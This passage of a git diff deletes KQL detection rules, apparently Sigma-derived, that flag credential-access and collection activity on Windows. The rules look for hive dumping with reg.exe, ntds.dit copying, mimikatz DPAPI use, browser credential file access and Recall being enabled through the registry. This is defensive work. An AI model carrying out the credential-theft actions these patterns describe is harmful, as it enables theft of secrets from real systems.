-| where (ProcessCommandLine contains "BackupRepositories" or ProcessCommandLine contains "Backups" or ProcessCommandLine contains "Credentials" or ProcessCommandLine contains "HostCreds" or ProcessCommandLine contains "SmbFileShares" or ProcessCommandLine contains "Ssh_creds" or ProcessCommandLine contains "VSphereInfo") and ((ProcessCommandLine contains "VeeamBackup" and ProcessCommandLine contains "From ") and FolderPath endswith "\\sqlcmd.exe")
\ No newline at end of file
diff --git a/Collection/Windows_Recall_Feature_Enabled_-_DisableAIDataAnalysis_Value_Deleted.kql b/Collection/Windows_Recall_Feature_Enabled_-_DisableAIDataAnalysis_Value_Deleted.kql
deleted file mode 100644
index c4ab53b9..00000000
--- a/Collection/Windows_Recall_Feature_Enabled_-_DisableAIDataAnalysis_Value_Deleted.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Sajid Nawaz Khan
-// Date: 2024/06/02
-// Level: medium
-// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value.
-Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
-This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
-
-// Tags: attack.collection, attack.t1113
-DeviceRegistryEvents
-| where ActionType =~ "DeleteValue" and RegistryKey endswith "\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis"
\ No newline at end of file
diff --git a/Collection/Windows_Recall_Feature_Enabled_-_Registry.kql b/Collection/Windows_Recall_Feature_Enabled_-_Registry.kql
deleted file mode 100644
index 198194ac..00000000
--- a/Collection/Windows_Recall_Feature_Enabled_-_Registry.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Sajid Nawaz Khan
-// Date: 2024/06/02
-// Level: medium
-// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0".
-Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
-This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
-
-// Tags: attack.collection, attack.t1113
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Software\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis"
\ No newline at end of file
diff --git a/Collection/Windows_Recall_Feature_Enabled_Via_Reg.EXE.kql b/Collection/Windows_Recall_Feature_Enabled_Via_Reg.EXE.kql
deleted file mode 100644
index 455bb30d..00000000
--- a/Collection/Windows_Recall_Feature_Enabled_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Sajid Nawaz Khan
-// Date: 2024/06/02
-// Level: medium
-// Description: Detects the enabling of the Windows Recall feature via registry manipulation.
-Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0.
-Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
-This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
-
-// Tags: attack.collection, attack.t1113
-DeviceProcessEvents
-| where (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "Microsoft\\Windows\\WindowsAI" and ProcessCommandLine contains "DisableAIDataAnalysis") and ((ProcessCommandLine contains "add" or ProcessCommandLine contains "0") or ProcessCommandLine contains "delete")
\ No newline at end of file
diff --git a/Collection/Winrar_Compressing_Dump_Files.kql b/Collection/Winrar_Compressing_Dump_Files.kql
deleted file mode 100644
index 6970f434..00000000
--- a/Collection/Winrar_Compressing_Dump_Files.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/04
-// Level: medium
-// Description: Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
-// Tags: attack.collection, attack.t1560.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and ((FolderPath endswith "\\rar.exe" or FolderPath endswith "\\winrar.exe") or ProcessVersionInfoFileDescription =~ "Command line RAR")
\ No newline at end of file
diff --git a/Collection/Winrar_Execution_in_Non-Standard_Folder.kql b/Collection/Winrar_Execution_in_Non-Standard_Folder.kql
deleted file mode 100644
index f6a68209..00000000
--- a/Collection/Winrar_Execution_in_Non-Standard_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Tigzy
-// Date: 2021/11/17
-// Level: medium
-// Description: Detects a suspicious winrar execution in a folder which is not the default installation folder
-// Tags: attack.collection, attack.t1560.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\rar.exe" or FolderPath endswith "\\winrar.exe") or ProcessVersionInfoFileDescription =~ "Command line RAR") and (not(((FolderPath contains ":\\Program Files (x86)\\WinRAR\\" or FolderPath contains ":\\Program Files\\WinRAR\\") or FolderPath endswith "\\UnRAR.exe"))) and (not(FolderPath contains ":\\Windows\\Temp\\"))
\ No newline at end of file
diff --git a/Credential Access/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql b/Credential Access/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql
deleted file mode 100644
index 5a91ee73..00000000
--- a/Credential Access/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/23
-// Level: high
-// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
-// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential_access, attack.impact
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-AADInt" or ProcessCommandLine contains "ConvertTo-AADInt" or ProcessCommandLine contains "Disable-AADInt" or ProcessCommandLine contains "Enable-AADInt" or ProcessCommandLine contains "Export-AADInt" or ProcessCommandLine contains "Get-AADInt" or ProcessCommandLine contains "Grant-AADInt" or ProcessCommandLine contains "Install-AADInt" or ProcessCommandLine contains "Invoke-AADInt" or ProcessCommandLine contains "Join-AADInt" or ProcessCommandLine contains "New-AADInt" or ProcessCommandLine contains "Open-AADInt" or ProcessCommandLine contains "Read-AADInt" or ProcessCommandLine contains "Register-AADInt" or ProcessCommandLine contains "Remove-AADInt" or ProcessCommandLine contains "Restore-AADInt" or ProcessCommandLine contains "Search-AADInt" or ProcessCommandLine contains "Send-AADInt" or ProcessCommandLine contains "Set-AADInt" or ProcessCommandLine contains "Start-AADInt" or ProcessCommandLine contains "Update-AADInt") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))
\ No newline at end of file
diff --git a/Credential Access/Access_To_Browser_Credential_Files_By_Uncommon_Application.kql b/Credential Access/Access_To_Browser_Credential_Files_By_Uncommon_Application.kql
deleted file mode 100644
index 7291b3f5..00000000
--- a/Credential Access/Access_To_Browser_Credential_Files_By_Uncommon_Application.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2022/04/09
-// Level: medium
-// Description: Detects file access requests to browser credential stores by uncommon processes.
-Could indicate potential attempt of credential stealing.
-Requires heavy baselining before usage
-
-// Tags: attack.t1003, attack.credential_access
-DeviceFileEvents
-| where ((FileName contains "\\Appdata\\Local\\Chrome\\User Data\\Default\\Login Data" or FileName contains "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies" or FileName contains "\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") or (FileName endswith "\\cookies.sqlite" or FileName endswith "release\\key3.db" or FileName endswith "release\\key4.db" or FileName endswith "release\\logins.json") or FileName endswith "\\Appdata\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat") and (not(((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\Microsoft\\Windows Defender\\" and (InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe")) or (InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe"))))
\ No newline at end of file
diff --git a/Credential Access/Access_To_Potentially_Sensitive_Sysvol_Files_By_Uncommon_Application.kql b/Credential Access/Access_To_Potentially_Sensitive_Sysvol_Files_By_Uncommon_Application.kql
deleted file mode 100644
index a9c88609..00000000
--- a/Credential Access/Access_To_Potentially_Sensitive_Sysvol_Files_By_Uncommon_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2023/12/21
-// Level: medium
-// Description: Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.
-// Tags: attack.credential_access, attack.t1552.006
-DeviceFileEvents
-| where ((FileName contains "\\sysvol\\" and FileName contains "\\Policies\\") and (FileName endswith "audit.csv" or FileName endswith "Files.xml" or FileName endswith "GptTmpl.inf" or FileName endswith "groups.xml" or FileName endswith "Registry.pol" or FileName endswith "Registry.xml" or FileName endswith "scheduledtasks.xml" or FileName endswith "scripts.ini" or FileName endswith "services.xml") and FileName startswith "\\") and (not((InitiatingProcessFolderPath startswith ":\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith ":\\Program Files\\" or InitiatingProcessFolderPath startswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath startswith ":\\Windows\\system32\\" or InitiatingProcessFolderPath startswith ":\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Credential Access/Access_To_Windows_Credential_History_File_By_Uncommon_Application.kql b/Credential Access/Access_To_Windows_Credential_History_File_By_Uncommon_Application.kql
deleted file mode 100644
index 89cda722..00000000
--- a/Credential Access/Access_To_Windows_Credential_History_File_By_Uncommon_Application.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/17
-// Level: medium
-// Description: Detects file access requests to the Windows Credential History File by an uncommon application.
-This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function
-
-// Tags: attack.credential_access, attack.t1555.004
-DeviceFileEvents
-| where FileName endswith "\\Microsoft\\Protect\\CREDHIST" and (not((InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or (InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\"))))
\ No newline at end of file
diff --git a/Credential Access/Access_To_Windows_DPAPI_Master_Keys_By_Uncommon_Application.kql b/Credential Access/Access_To_Windows_DPAPI_Master_Keys_By_Uncommon_Application.kql
deleted file mode 100644
index 58097097..00000000
--- a/Credential Access/Access_To_Windows_DPAPI_Master_Keys_By_Uncommon_Application.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/17
-// Level: medium
-// Description: Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application.
-This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function
-
-// Tags: attack.credential_access, attack.t1555.004
-DeviceFileEvents
-| where (FileName contains "\\Microsoft\\Protect\\S-1-5-18\\" or FileName contains "\\Microsoft\\Protect\\S-1-5-21-") and (not((InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Credential Access/Active_Directory_Database_Snapshot_Via_ADExplorer.kql b/Credential Access/Active_Directory_Database_Snapshot_Via_ADExplorer.kql
deleted file mode 100644
index 35b910af..00000000
--- a/Credential Access/Active_Directory_Database_Snapshot_Via_ADExplorer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/14
-// Level: medium
-// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database.
-// Tags: attack.credential_access, attack.t1552.001, attack.t1003.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "snapshot" and (FolderPath endswith "\\ADExplorer.exe" or ProcessVersionInfoOriginalFileName =~ "AdExp")
\ No newline at end of file
diff --git a/Credential Access/Automated_Collection_Command_Prompt.kql b/Credential Access/Automated_Collection_Command_Prompt.kql
deleted file mode 100644
index 9f680167..00000000
--- a/Credential Access/Automated_Collection_Command_Prompt.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/28
-// Level: medium
-// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
-// Tags: attack.collection, attack.t1119, attack.credential_access, attack.t1552.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".docx" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xlsx" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".pptx" or ProcessCommandLine contains ".rtf" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".txt") and ((ProcessCommandLine contains "dir " and ProcessCommandLine contains " /b " and ProcessCommandLine contains " /s ") or ((ProcessCommandLine contains " /e " or ProcessCommandLine contains " /si ") and ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE"))
\ No newline at end of file
diff --git a/Credential Access/Browser_Started_with_Remote_Debugging.kql b/Credential Access/Browser_Started_with_Remote_Debugging.kql
deleted file mode 100644
index a1e712fd..00000000
--- a/Credential Access/Browser_Started_with_Remote_Debugging.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/27
-// Level: medium
-// Description: Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks
-// Tags: attack.credential_access, attack.t1185
-DeviceProcessEvents
-| where ProcessCommandLine contains " --remote-debugging-" or (ProcessCommandLine contains " -start-debugger-server" and FolderPath endswith "\\firefox.exe")
\ No newline at end of file
diff --git a/Credential Access/Capture_Credentials_with_Rpcping.exe.kql b/Credential Access/Capture_Credentials_with_Rpcping.exe.kql
deleted file mode 100644
index a795212c..00000000
--- a/Credential Access/Capture_Credentials_with_Rpcping.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Julia Fomina, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
-// Tags: attack.credential_access, attack.t1003
-DeviceProcessEvents
-| where FolderPath endswith "\\rpcping.exe" and (ProcessCommandLine contains "-s" or ProcessCommandLine contains "/s") and (((ProcessCommandLine contains "-u" or ProcessCommandLine contains "/u") and (ProcessCommandLine contains "NTLM")) or ((ProcessCommandLine contains "-t" or ProcessCommandLine contains "/t") and (ProcessCommandLine contains "ncacn_np")))
\ No newline at end of file
diff --git a/Credential Access/Certificate_Exported_Via_PowerShell.kql b/Credential Access/Certificate_Exported_Via_PowerShell.kql
deleted file mode 100644
index 3d1a911f..00000000
--- a/Credential Access/Certificate_Exported_Via_PowerShell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/18
-// Level: medium
-// Description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
-// Tags: attack.credential_access, attack.execution, attack.t1552.004, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "Export-PfxCertificate " or ProcessCommandLine contains "Export-Certificate "
\ No newline at end of file
diff --git a/Credential Access/Copying_Sensitive_Files_with_Credential_Data.kql b/Credential Access/Copying_Sensitive_Files_with_Credential_Data.kql
deleted file mode 100644
index 7128b3f4..00000000
--- a/Credential Access/Copying_Sensitive_Files_with_Credential_Data.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
-// Date: 2019/10/22
-// Level: high
-// Description: Files with well-known filenames (sensitive files with credential data) copying
-// Tags: attack.credential_access, attack.t1003.002, attack.t1003.003, car.2013-07-001, attack.s0404
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "vss" or ProcessCommandLine contains " /m " or ProcessCommandLine contains " /y ") and (FolderPath endswith "\\esentutl.exe" or ProcessVersionInfoOriginalFileName =~ "\\esentutl.exe")) or (ProcessCommandLine contains "\\windows\\ntds\\ntds.dit" or ProcessCommandLine contains "\\config\\sam" or ProcessCommandLine contains "\\config\\security" or ProcessCommandLine contains "\\config\\system " or ProcessCommandLine contains "\\repair\\sam" or ProcessCommandLine contains "\\repair\\system" or ProcessCommandLine contains "\\repair\\security" or ProcessCommandLine contains "\\config\\RegBack\\sam" or ProcessCommandLine contains "\\config\\RegBack\\system" or ProcessCommandLine contains "\\config\\RegBack\\security")
\ No newline at end of file
diff --git a/Credential Access/CrackMapExec_File_Indicators.kql b/Credential Access/CrackMapExec_File_Indicators.kql
deleted file mode 100644
index a26d915b..00000000
--- a/Credential Access/CrackMapExec_File_Indicators.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/03/11
-// Level: high
-// Description: Detects file creation events with filename patterns used by CrackMapExec.
-// Tags: attack.credential_access, attack.t1003.001
-DeviceFileEvents
-| where FolderPath startswith "C:\\Windows\\Temp\\" and ((FolderPath matches regex "\\\\[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\\.txt$" or FolderPath matches regex "\\\\[a-zA-Z]{8}\\.tmp$") or (FolderPath endswith "\\temp.ps1" or FolderPath endswith "\\msol.ps1"))
\ No newline at end of file
diff --git a/Credential Access/CredUI.DLL_Loaded_By_Uncommon_Process.kql b/Credential Access/CredUI.DLL_Loaded_By_Uncommon_Process.kql
deleted file mode 100644
index 0fb4879a..00000000
--- a/Credential Access/CredUI.DLL_Loaded_By_Uncommon_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/20
-// Level: medium
-// Description: Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".
-// Tags: attack.credential_access, attack.collection, attack.t1056.002
-DeviceImageLoadEvents
-| where ((FolderPath endswith "\\credui.dll" or FolderPath endswith "\\wincredui.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("credui.dll", "wincredui.dll"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe", "C:\\Windows\\regedit.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath startswith "C:\\Users\\") or InitiatingProcessFolderPath endswith "\\opera_autoupdate.exe" or (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Teams\\" and InitiatingProcessFolderPath endswith "\\Teams.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/Credential Access/Cred_Dump_Tools_Dropped_Files.kql b/Credential Access/Cred_Dump_Tools_Dropped_Files.kql
deleted file mode 100644
index 7914875e..00000000
--- a/Credential Access/Cred_Dump_Tools_Dropped_Files.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, oscd.community
-// Date: 2019/11/01
-// Level: high
-// Description: Files with well-known filenames (parts of credential dump software or files produced by them) creation
-// Tags: attack.credential_access, attack.t1003.001, attack.t1003.002, attack.t1003.003, attack.t1003.004, attack.t1003.005
-DeviceFileEvents
-| where (FolderPath contains "\\fgdump-log" or FolderPath contains "\\kirbi" or FolderPath contains "\\pwdump" or FolderPath contains "\\pwhashes" or FolderPath contains "\\wce_ccache" or FolderPath contains "\\wce_krbtkts") or (FolderPath endswith "\\cachedump.exe" or FolderPath endswith "\\cachedump64.exe" or FolderPath endswith "\\DumpExt.dll" or FolderPath endswith "\\DumpSvc.exe" or FolderPath endswith "\\Dumpy.exe" or FolderPath endswith "\\fgexec.exe" or FolderPath endswith "\\lsremora.dll" or FolderPath endswith "\\lsremora64.dll" or FolderPath endswith "\\NTDS.out" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\pstgdump.exe" or FolderPath endswith "\\pwdump.exe" or FolderPath endswith "\\SAM.out" or FolderPath endswith "\\SECURITY.out" or FolderPath endswith "\\servpw.exe" or FolderPath endswith "\\servpw64.exe" or FolderPath endswith "\\SYSTEM.out" or FolderPath endswith "\\test.pwd" or FolderPath endswith "\\wceaux.dll")
\ No newline at end of file
diff --git a/Credential Access/Credential_Manager_Access_By_Uncommon_Application.kql b/Credential Access/Credential_Manager_Access_By_Uncommon_Application.kql
deleted file mode 100644
index 3451a855..00000000
--- a/Credential Access/Credential_Manager_Access_By_Uncommon_Application.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/11
-// Level: medium
-// Description: Detects suspicious processes based on name and location that access the windows credential manager and vault.
-Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function
-
-// Tags: attack.t1003, attack.credential_access
-DeviceFileEvents
-| where (FileName contains "\\AppData\\Local\\Microsoft\\Credentials\\" or FileName contains "\\AppData\\Roaming\\Microsoft\\Credentials\\" or FileName contains "\\AppData\\Local\\Microsoft\\Vault\\" or FileName contains "\\ProgramData\\Microsoft\\Vault\\") and (not((InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Windows\\system32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Credential Access/Dropping_Of_Password_Filter_DLL.kql b/Credential Access/Dropping_Of_Password_Filter_DLL.kql
deleted file mode 100644
index 2ced395a..00000000
--- a/Credential Access/Dropping_Of_Password_Filter_DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sreeman
-// Date: 2020/10/29
-// Level: medium
-// Description: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS
-// Tags: attack.credential_access, attack.t1556.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "scecli\\0" and ProcessCommandLine contains "reg add"
\ No newline at end of file
diff --git a/Credential Access/Dumping_Process_via_Sqldumper.exe.kql b/Credential Access/Dumping_Process_via_Sqldumper.exe.kql
deleted file mode 100644
index ec50686d..00000000
--- a/Credential Access/Dumping_Process_via_Sqldumper.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kirill Kiryanov, oscd.community
-// Date: 2020/10/08
-// Level: medium
-// Description: Detects process dump via legitimate sqldumper.exe binary
-// Tags: attack.credential_access, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "0x0110" or ProcessCommandLine contains "0x01100:40") and FolderPath endswith "\\sqldumper.exe"
\ No newline at end of file
diff --git a/Credential Access/Dumping_of_Sensitive_Hives_Via_Reg.EXE.kql b/Credential Access/Dumping_of_Sensitive_Hives_Via_Reg.EXE.kql
deleted file mode 100644
index 473cc6b9..00000000
--- a/Credential Access/Dumping_of_Sensitive_Hives_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113
-// Date: 2019/10/22
-// Level: high
-// Description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.
-// Tags: attack.credential_access, attack.t1003.002, attack.t1003.004, attack.t1003.005, car.2013-07-001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " save " or ProcessCommandLine contains " export " or ProcessCommandLine contains " ˢave " or ProcessCommandLine contains " eˣport ") and (ProcessCommandLine contains "\\system" or ProcessCommandLine contains "\\sam" or ProcessCommandLine contains "\\security" or ProcessCommandLine contains "\\ˢystem" or ProcessCommandLine contains "\\syˢtem" or ProcessCommandLine contains "\\ˢyˢtem" or ProcessCommandLine contains "\\ˢam" or ProcessCommandLine contains "\\ˢecurity") and (ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hk˪m" or ProcessCommandLine contains "hkey_local_machine" or ProcessCommandLine contains "hkey_˪ocal_machine" or ProcessCommandLine contains "hkey_loca˪_machine" or ProcessCommandLine contains "hkey_˪oca˪_machine") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/Credential Access/Enumeration_for_3rd_Party_Creds_From_CLI.kql b/Credential Access/Enumeration_for_3rd_Party_Creds_From_CLI.kql
deleted file mode 100644
index 8512a497..00000000
--- a/Credential Access/Enumeration_for_3rd_Party_Creds_From_CLI.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/20
-// Level: medium
-// Description: Detects processes that query known 3rd party registry keys that holds credentials via commandline
-// Tags: attack.credential_access, attack.t1552.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\Sessions" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\SshHostKeys\\" or ProcessCommandLine contains "\\Software\\Mobatek\\MobaXterm\\" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Radmin\\v3.0\\Server\\Parameters\\Radmin" or ProcessCommandLine contains "\\Software\\Aerofox\\FoxmailPreview" or ProcessCommandLine contains "\\Software\\Aerofox\\Foxmail\\V3.1" or ProcessCommandLine contains "\\Software\\IncrediMail\\Identities" or ProcessCommandLine contains "\\Software\\Qualcomm\\Eudora\\CommandLine" or ProcessCommandLine contains "\\Software\\RimArts\\B2\\Settings" or ProcessCommandLine contains "\\Software\\OpenVPN-GUI\\configs" or ProcessCommandLine contains "\\Software\\Martin Prikryl\\WinSCP 2\\Sessions" or ProcessCommandLine contains "\\Software\\FTPWare\\COREFTP\\Sites" or ProcessCommandLine contains "\\Software\\DownloadManager\\Passwords" or ProcessCommandLine contains "\\Software\\OpenSSH\\Agent\\Keys" or ProcessCommandLine contains "\\Software\\TightVNC\\Server" or ProcessCommandLine contains "\\Software\\ORL\\WinVNC3\\Password" or ProcessCommandLine contains "\\Software\\RealVNC\\WinVNC4"
\ No newline at end of file
diff --git a/Credential Access/Enumeration_for_Credentials_in_Registry.kql b/Credential Access/Enumeration_for_Credentials_in_Registry.kql
deleted file mode 100644
index 1ba1bafc..00000000
--- a/Credential Access/Enumeration_for_Credentials_in_Registry.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2021/12/20
-// Level: medium
-// Description: Adversaries may search the Registry on compromised systems for insecurely stored credentials.
-The Windows Registry stores configuration information that can be used by the system or other programs.
-Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services
-
-// Tags: attack.credential_access, attack.t1552.002
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " query " and ProcessCommandLine contains "/t " and ProcessCommandLine contains "REG_SZ" and ProcessCommandLine contains "/s") and FolderPath endswith "\\reg.exe") and ((ProcessCommandLine contains "/f " and ProcessCommandLine contains "HKLM") or (ProcessCommandLine contains "/f " and ProcessCommandLine contains "HKCU") or ProcessCommandLine contains "HKCU\\Software\\SimonTatham\\PuTTY\\Sessions")
\ No newline at end of file
diff --git a/Credential Access/Esentutl_Gather_Credentials.kql b/Credential Access/Esentutl_Gather_Credentials.kql
deleted file mode 100644
index 737a9cd8..00000000
--- a/Credential Access/Esentutl_Gather_Credentials.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: sam0x90
-// Date: 2021/08/06
-// Level: medium
-// Description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.
-// Tags: attack.credential_access, attack.t1003, attack.t1003.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "esentutl" and ProcessCommandLine contains " /p"
\ No newline at end of file
diff --git a/Credential Access/Esentutl_Volume_Shadow_Copy_Service_Keys.kql b/Credential Access/Esentutl_Volume_Shadow_Copy_Service_Keys.kql
deleted file mode 100644
index 7ff25f25..00000000
--- a/Credential Access/Esentutl_Volume_Shadow_Copy_Service_Keys.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/20
-// Level: high
